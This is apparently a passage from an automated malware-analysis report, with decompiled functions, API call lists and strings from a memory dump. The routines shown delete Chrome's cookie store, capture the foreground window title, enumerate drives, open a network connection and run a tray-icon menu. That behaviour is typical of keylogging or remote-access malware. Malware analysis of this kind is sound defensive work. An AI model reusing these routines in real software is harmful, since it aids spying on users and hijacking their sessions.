                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					return 1;
                                  				}
                                  				if(_t20 == 1) {
                                  					_t21 =  &_v5;
                                  					goto L5;
                                  				}
                                  				_t25 = 0;
                                  				goto L8;
                                  			}

                                  APIs
                                  • getenv.MSVCRT ref: 004071E4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004071EF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004071FA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407205
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040720E
                                  • DeleteFileA.KERNEL32(00000000), ref: 00407215
                                  • GetLastError.KERNEL32 ref: 0040721F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies not found],00000000), ref: 0040723E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040724F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies found, cleared!],00000000), ref: 00407271
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407284
                                  Strings
                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 004071D9
                                  • UserProfile, xrefs: 004071DF
                                  • [Chrome Cookies found, cleared!], xrefs: 0040726C
                                  • [Chrome Cookies not found], xrefs: 00407239
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                  • API String ID: 3740952235-304995407
                                  • Opcode ID: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                  • Instruction ID: 500589693ed1866fcec617c4cf6893fdd7c78fd48f7414b1be1692f61b7e1039
                                  • Opcode Fuzzy Hash: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                  • Instruction Fuzzy Hash: AE119375D04609EBCB00FBA0DD4E9FE7738EA94741750007AF812E31D1EB796A45CAAB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 32%
                                  			E0041203B(char _a4, char _a20) {
                                  				struct _SYSTEMTIME _v20;
                                  				char _v36;
                                  				char _v52;
                                  				char _v68;
                                  				char _v84;
                                  				int _t18;
                                  				char* _t26;
                                  				char* _t27;
                                  				char* _t28;
                                  				char* _t29;
                                  
                                  				if( *0x41bcac != 0) {
                                  					GetLocalTime( &_v20);
                                  					_t3 =  &(_v20.wSecond); // 0x4051ef
                                  					_t26 =  &_v84;
                                  					L00414176();
                                  					_t27 =  &_v68;
                                  					L00414170();
                                  					_t28 =  &_v52;
                                  					L00414140();
                                  					_t29 =  &_v36;
                                  					L00414170();
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t29, _t28, _t28, _t27, _t27, _t26, _t26, "%02i:%02i:%02i:%03i ",  &_a4, " ",  &_a20, 0x415770, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff,  *_t3 & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff);
                                  					_t18 = printf(_t29);
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				}
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return _t18;
                                  			}

                                  APIs
                                  • GetLocalTime.KERNEL32(?), ref: 00412052
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                  • printf.MSVCRT ref: 004120BF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                  • String ID: %02i:%02i:%02i:%03i $Q@
                                  • API String ID: 4249031962-3186260181
                                  • Opcode ID: 383fa367f66b16673637636e30dcf8b22da4594b4546bf8840b2870d857023be
                                  • Instruction ID: f3ca9ea98f16ce9d12e0c862744fbe2e8a9e2291361fb12ebe279ffe92a69474
                                  • Opcode Fuzzy Hash: 383fa367f66b16673637636e30dcf8b22da4594b4546bf8840b2870d857023be
                                  • Instruction Fuzzy Hash: 9311D3B680011DFBCF01EBE1EC49DEF7B7CBA54745B044026F912D2061EB789699CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 00405853
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405868
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405874
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405898
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004058AE
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058B7
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004058CC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058D6
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310), ref: 00405902
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405922
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040590C
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310), ref: 00405943
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040594D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405963
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405974
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040597F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,0041B310), ref: 00405994
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@D@1@@$?data@?$basic_string@?length@?$basic_string@G@2@@std@@G@std@@V01@@$?empty@?$basic_string@CreateFileconnect
                                  • String ID:
                                  • API String ID: 257471410-0
                                  • Opcode ID: 6207ffe4a099ce9ea2bf100b0fc1d7ab3a8a9b3eb8558767b37f4f87605fa35e
                                  • Instruction ID: a7298ed754ce3842782531f55b1250d517e56450e3269786ed83483861d592cb
                                  • Opcode Fuzzy Hash: 6207ffe4a099ce9ea2bf100b0fc1d7ab3a8a9b3eb8558767b37f4f87605fa35e
                                  • Instruction Fuzzy Hash: 034152B2D00508ABCB05FBA1ED5A9EE7738DF54304B10407AE912B71D2EB795F48CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 30%
                                  			E00412F73(char _a4, void* _a20) {
                                  				char _v5;
                                  				void* _v24;
                                  				char _v40;
                                  				int _t26;
                                  				int _t29;
                                  				void* _t37;
                                  				unsigned int _t66;
                                  				signed int _t67;
                                  				int _t70;
                                  				signed short _t73;
                                  				struct HWND__* _t81;
                                  				void* _t83;
                                  
                                  				_t81 = GetForegroundWindow();
                                  				_t26 = GetWindowTextLengthA(_t81);
                                  				_t89 = _t26;
                                  				if(_t26 <= 0) {
                                  					L6:
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					return 0;
                                  				}
                                  				_t28 = _t26 + 1;
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z( &_v5);
                                  				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t29 = GetWindowTextA(_t81, _t26 + 1, _t26 + 1);
                                  				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
                                  				__imp__?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
                                  				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
                                  				E00413A29(_t29, _t29, _t29, __imp__tolower);
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				E004129EB(_t89,  &_v40,  &_a4, 0x415b80,  &_v5, _t28, 0);
                                  				_t73 = 0;
                                  				if(E00401838( &_v40) <= 0) {
                                  					L5:
                                  					E004017DD( &_v40);
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					goto L6;
                                  				}
                                  				_t82 = 0;
                                  				while(1) {
                                  					_t37 = E0040180C( &_v40, 0, _t82);
                                  					__imp__?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z(_t37, 0);
                                  					if(_t37 !=  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                  						break;
                                  					}
                                  					_t73 = _t73 + 1;
                                  					_t82 = _t73 & 0x0000ffff;
                                  					if((_t73 & 0x0000ffff) < E00401838( &_v40)) {
                                  						continue;
                                  					}
                                  					goto L5;
                                  				}
                                  				__eflags = _a20;
                                  				if(_a20 != 0) {
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  					asm("repne scasb");
                                  					_t66 =  !( &_v24 | 0xffffffff);
                                  					_t83 = _t37 - _t66;
                                  					_t67 = _t66 >> 2;
                                  					_t70 = memcpy(_a20, _t83, _t67 << 2) & 0x00000003;
                                  					__eflags = _t70;
                                  					memcpy(_t83 + _t67 + _t67, _t83, _t70);
                                  				}
                                  				E004017DD( &_v40);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 1;
                                  			}

                                  APIs
                                  • GetForegroundWindow.USER32(?,0041BCB0,?,?,?,?,?,?,?,?,0040542E), ref: 00412F7B
                                  • GetWindowTextLengthA.USER32(00000000), ref: 00412F84
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040542E), ref: 00412F9D
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FA6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FB0
                                  • GetWindowTextA.USER32 ref: 00412FB8
                                  • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FC7
                                  • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FD1
                                  • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FDB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B80,?,00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FF2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040542E), ref: 00413001
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00413032
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041305D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00413066
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0041307B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004130AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004130B5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@$D@1@@V12@Window$?begin@?$basic_string@?c_str@?$basic_string@?find@?$basic_string@TextV01@@$??4?$basic_string@?end@?$basic_string@?substr@?$basic_string@ForegroundLengthV01@
                                  • String ID:
                                  • API String ID: 3496238640-0
                                  • Opcode ID: 4cce06ad55edbceb2eb1acd16d276c83b26923f47a7b414541e37ea5d0900f90
                                  • Instruction ID: d45ca6ef39ea3e178db3ab1d94ac08b999b831b850f622e5a8fdf4a981eaba08
                                  • Opcode Fuzzy Hash: 4cce06ad55edbceb2eb1acd16d276c83b26923f47a7b414541e37ea5d0900f90
                                  • Instruction Fuzzy Hash: 02414E32500509DBCB04EFA1DD5A9EE7BB8EF94342B10416AF803A31A0EF745F45CA69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310), ref: 00403752
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 0040375B
                                  • GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 00403773
                                  • _itoa.MSVCRT ref: 0040377A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 00403790
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403798
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 004037A7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004037B4
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004037C0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037C9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037D2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037DB
                                  • lstrlenA.KERNEL32(00000000), ref: 004037E2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004037F8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 00403801
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 0040380A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?data@?$basic_string@DriveTypeV01@_itoalstrlen
                                  • String ID:
                                  • API String ID: 3966177967-0
                                  • Opcode ID: 2ed17a773f70f2a2b96c76149902b1bc02ebe8e478459ea86c20583d4a86547d
                                  • Instruction ID: 4300f458e19456516dd56dc641f8d1b829b254aea369022c8032761b79b8ee60
                                  • Opcode Fuzzy Hash: 2ed17a773f70f2a2b96c76149902b1bc02ebe8e478459ea86c20583d4a86547d
                                  • Instruction Fuzzy Hash: B721ADB580060DEBCB05EBE0ED5DDDE777CAF54346B108025F912A3160EB746B49CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
			E00413C3F(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				// Window procedure for the sample's tray icon: _a4 = hWnd, _a8 = uMsg, _a12 = wParam, _a16 = lParam.
				// The decompiler expresses the message switch as chained subtractions; the resolved
				// constants are noted inline. Trailing comments give the instruction address of each statement
				// (the address column the report prints beside the code).
				struct tagPOINT _v12;
				void* _t16;
				struct HMENU__* _t17;
				void* _t20;
				void* _t24;

				_t16 = _a8 - 1;                                                       // 0x00413c47
				if(_t16 == 0) {                                                       // 0x00413c48  uMsg == WM_CREATE (0x1)
					_t17 = CreatePopupMenu();                                         // 0x00413d1c
					 *0x41c1f0 = _t17;                                                // 0x00413d2c  global HMENU
					AppendMenuA(_t17, 0, 0, "Close");                                 // 0x00413d31  single item "Close", item id 0
					L15:                                                              // 0x00413d37
					return 0;
				}
				_t20 = _t16 - 0x110;                                                  // 0x00413c4e
				if(_t20 == 0) {                                                       // 0x00413c53  uMsg == WM_COMMAND (0x111)
					if(_a12 != 0) {                                                   // 0x00413d03  only item id 0 ("Close") is handled
						goto L15;
					}
					Shell_NotifyIconA(2, 0x41c200);                                   // 0x00413d0c  NIM_DELETE (2): remove the tray icon
					ExitProcess(0);                                                   // 0x00413d14
				}
				if(_t20 == 0x2f0) {                                                   // 0x00413c5e  uMsg == 0x401 = WM_USER+1, the tray-icon callback message
					_t24 = _a16 - 0x201;                                              // 0x00413c7a
					if(_t24 == 0) {                                                   // 0x00413c7f  lParam == WM_LBUTTONDOWN (0x201): toggle the window
						if(IsWindowVisible( *0x41c1fc) == 0) {                        // 0x00413cd1
							ShowWindow( *0x41c1fc, 9);                                // 0x00413ceb  SW_RESTORE
							SetForegroundWindow( *0x41c1fc);                          // 0x00413cf7
						} else {                                                      // 0x00413cd3
							ShowWindow( *0x41c1fc, 0);                                // 0x00413cdb  SW_HIDE
						}
						goto L15;
					}
					if(_t24 == 3) {                                                   // 0x00413c84  lParam == WM_RBUTTONDOWN (0x204): show the context menu
						GetCursorPos( &_v12);                                         // 0x00413c97
						SetForegroundWindow(_a4);                                     // 0x00413ca0
						TrackPopupMenu( *0x41c1f0, 0, _v12, _v12.y, 0, _a4, 0);       // 0x00413cbb
						goto L15;
					}
					_push(_a16);                                                      // 0x00413c86
					_push(_a12);                                                      // 0x00413c89
					_push(0x401);                                                     // 0x00413c8c
					L4:                                                               // 0x00413c69
					return DefWindowProcA(_a4, ??, ??, ??);
				}
				_push(_a16);                                                          // 0x00413c60
				_push(_a12);                                                          // 0x00413c63
				_push(_a8);                                                           // 0x00413c66
				goto L4;
			}

                                  APIs
                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 00413C6C
                                  • GetCursorPos.USER32(?), ref: 00413C97
                                  • SetForegroundWindow.USER32(?), ref: 00413CA0
                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00413CBB
